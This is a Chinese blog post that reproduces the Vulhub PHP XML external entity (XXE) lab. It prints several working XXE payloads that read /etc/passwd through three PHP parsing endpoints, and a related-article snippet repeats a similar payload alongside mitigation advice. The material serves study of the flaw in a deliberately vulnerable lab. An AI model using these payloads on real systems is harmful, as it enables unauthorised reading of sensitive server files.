PHP环境 XML外部实体注入漏洞(XXE)

最新推荐文章于 2024-06-07 18:14:19 发布
最新推荐文章于 2024-06-07 18:14:19 发布
阅读量607 收藏 1
点赞数
分类专栏: XXE 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43886198/article/details/111475187
版权

PHP环境 XML外部实体注入漏洞(XXE)

环境介绍:

  • PHP 7.0.30
  • libxml 2.8.0

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。

使用如下命令编译并启动环境:

docker-compose up -d

环境启动后,访问http://your-ip:8080/index.php即可看到phpinfo,搜索libxml即可看到其版本为2.8.0。

Web目录为./www,其中包含4个文件:

$ tree .
.
├── dom.php # 示例:使用DOMDocument解析body
├── index.php
├── SimpleXMLElement.php # 示例:使用SimpleXMLElement类解析body
└── simplexml_load_string.php # 示例:使用simplexml_load_string函数解析body

dom.phpSimpleXMLElement.phpsimplexml_load_string.php均可触发XXE漏洞

  • 漏洞点 /simplexml_load_string.php

  • dom.php

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<x>&xxe;</x>

在这里插入图片描述

  • SimpleXMLElement.php
<?xml version="1.0"?>
<!DOCTYPE xxe[
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xxe>
<name>&xxe;</name>
</xxe>

​```

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

成功读取到/etc/passwd

在这里插入图片描述

  • simplexml_load_string.php
<?xml version="1.0"?>
<!DOCTYPE xxe[
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xxe>
<name>&xxe;</name>
</xxe>
  • 成功读取到文件

在这里插入图片描述

暮光烛日
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulhub-php_xxe
Mccc_li的博客
04-16 804
test
[Vulhub] PHP环境 XML外部实体注入漏洞XXE
weixin_45605352的博客
05-07 3315
0x01 预备知识 XXE是什么? XXE(XML External Entity Injection)也就是XML外部实体注入XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml 库,而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体外部参数实体)做合适的处理,并且实体的URL支持 file:// 和 ftp:// 等协议,导致可加载恶意外部文件和代码,造成 任意文件读取、命令执行、
漏洞英文bug/PHP环境XML外部实体注入漏洞(XXE)_零开始信息安全知识点
最新发布
程序员六七的博客
06-07 396
1、XML介绍XML叫做可扩展标记语言,类似于HTML,但是他们之间又有着明显的差别;HTML的主要作用是用来显示数据的,而XML的主要作用是传输和存储数据的。
(vulhub)PHP环境XML外部实体注入漏洞XXE
Gjqhs的博客
03-08 1017
Vulhub 靶场安装_Gjqhs的博客-CSDN博客 查询对应镜像 打开docker systemctl start docker 设置docker自启动 systemctl enable docker 查看docker状态 systemctl status docker 查找xxe镜像 docker search php_xxe 拉取镜像,(有可能超时,如下) 启动xxe服务 访问即可见此页面,可看到其版本为2.8.0。 http:...
php xxe注入,PHP XXE漏洞
weixin_33764463的博客
03-10 460
PHP xml 外部实体注入漏洞(XXE)1.环境PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用2.原理介绍XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、存储以及传输信息...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体XML文档的一部分,允许引用外部资源,如文件系统、网络...
基于XXE漏洞的网络安全分析与利用工具开发
05-07
当应用是通过用户上传的XML文件或POST请求进行数唱的传输,并日应用没有禁止XNML引用外部实体,也没有过滤用户提交的XML数据,那么就会产生XML外部实体注入漏洞,即XXE漏洞XXE漏洞发生在应用程序解析XML输入时,...
XXE超详细讲解 全网仅此一份
07-06
XXEXML External Entity injection)是一种安全漏洞,它发生在解析XML输入时,由于应用程序未能正确处理外部实体,攻击者能够注入恶意的XML实体,从而读取服务器上的敏感文件、执行系统命令或探测内网资源。...
xml-security:用于XML安全性的SimpleSAMLphp
03-15
2. **XXEXML外部实体注入)**:攻击者利用XML文档的外部实体引用,访问本地文件系统或网络资源,可能导致数据泄露。 3. **XSS(跨站脚本)**:虽然主要针对HTML,但XML也可以被用于XSS攻击,允许攻击者在用户...
浅谈php://filter的妙用
10-17
XML外部实体注入XXEXML External Entity Injection)是一种常见的安全漏洞,允许攻击者通过恶意构造的XML输入来获取服务器内部敏感信息。在处理XXE时,`php://filter`经常用于编码和转换文件内容,以防止解析...
php-7.0.30
10-29
php-7.0.30.tar.gz 源码安装使用;方便各种用户获取。
(vulhub靶机通关) XXE LAB: 1
yang1234567898的博客
01-16 2756
靶机下载地址:https://download.vulnhub.com/xxe/XXE.zip 信息收集: 主机IP:192.168.43.48 开放了80端口 目录扫描:发现robots.txt 查看robots.txt,发现admin.php,还有一个xxe目录 直接访问admin.php报404,应该是不在根目录 扫描192.168.43.48/xxe目录,发现admin.php 访问xxe,是一个登录页面,应该就是admin.php 尝试弱口令和注入无果...
php slim 教程,php框架slim架构上存在XXE漏洞XXE的典型存在形式)
weixin_35149268的博客
03-10 392
现代cms框架(laraval/symfony/slim)的出现,导致现今的php漏洞出现点、原理、利用方法,发生了一些变化,这个系列希望可以总结一下自己挖掘的此类cms漏洞。slim是一个设计思路超前的知名的php轻框架,完美结合了psr7来设计,至今用户已超过100w:在阅读其源码的过程中,我发现其存在一个只有在框架式CMS中才会出现的漏洞漏洞详情这个漏洞存在于最新版(3.0)中。首先用co...
靶机通关 | vulhub-XXE靶机通关秘籍~
鱼溯的博客
09-20 497
vulhub-XXE靶机通关秘籍~
PHP XXE漏洞
weixin_30849591的博客
01-24 1083
PHP xml 外部实体注入漏洞XXE) 1.环境 PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用 2.原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、...
vulhub中间件解析漏洞复现
m0_46684679的博客
12-07 1090
vulhub中间件解析漏洞复现
记一次Vulnhub-XXE靶场全过程(详细)
DoNotShyDoIt的博客
12-22 315
Vulnhub-XXE靶场全过程
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、URL等。当XML解析器解析XML文档时,如果不对外部实体进行限制,攻击者可以通过构造恶意的XML文档,将外部实体指向敏感文件或者恶意URL,从而导致漏洞。 具体来说,攻击者可以在XML文档中定义一个实体,使用DTD(Document Type Definition)语法将该实体指向一个外部文件,然后在XML文档中使用该实体。当XML解析器解析该实体时,就会将指定的外部文件读取进来,从而导致漏洞。 例如,下面的XML文档定义了一个名为“file”的实体,指向了一个敏感文件“/etc/passwd”: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ELEMENT message (#PCDATA)> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <message>&file;</message> ``` 如果XML解析器不对外部实体进行限制,那么解析该文档时就会读取“/etc/passwd”文件的内容,并将其包含在<message>元素中返回给应用程序,从而导致敏感信息泄漏。 为了防止XXE漏洞,可以采取以下措施: 1. 禁止使用外部实体,或者限制外部实体的使用范围。可以在XML解析器中设置相关参数,例如禁止加载外部实体、禁止解析DTD等。 2. 对外部实体进行白名单过滤,只允许加载特定的URL或文件。 3. 检查输入数据,避免恶意输入注入XML文档中。 4. 对于持久化的XML数据,应该使用安全XML库来处理,例如使用DOM4J或JAXB等库,这些库会自动过滤掉外部实体

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值